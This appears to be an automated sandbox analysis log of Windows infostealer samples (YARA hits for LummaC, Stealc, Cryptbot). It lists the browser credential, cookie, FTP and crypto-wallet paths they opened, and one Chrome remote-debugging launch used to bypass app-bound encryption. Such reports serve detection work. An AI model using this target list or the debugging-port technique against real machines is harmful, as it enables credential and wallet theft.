Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Yara detected Credential Stealer
Source: Yara match File source: 00000009.00000003.2687234574.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2691719903.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2687820469.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2687023350.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2684773955.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2687551032.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2692244836.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2690149130.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2689623976.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2689107439.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2684931089.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2689461786.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2685083573.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2685489848.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2688197199.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2691008602.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2686690326.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2656642315.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2689292480.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2686127655.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2686379519.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2686826837.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2684618829.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2691890013.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2689912258.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2691231854.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2685228228.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2657928655.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2687374958.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2691530226.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2687687305.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2685966414.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2629461937.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2684409963.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2692800231.0000000001242000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2688669064.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2688360776.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2685660579.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2688510791.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2688046289.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2685819613.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2690743113.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2686546843.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2692391069.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2692056970.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2688928457.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2629911709.0000000001240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2235d4f703.exe PID: 8096, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2235d4f703.exe PID: 2132, type: MEMORYSTR

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: 9afe8d29fa.exe PID: 4500, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: 2235d4f703.exe PID: 8096, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 2235d4f703.exe PID: 2132, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000020.00000002.2938363540.0000000000F31000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2949459984.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.2849604282.00000000057C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2637178904.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2688574615.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
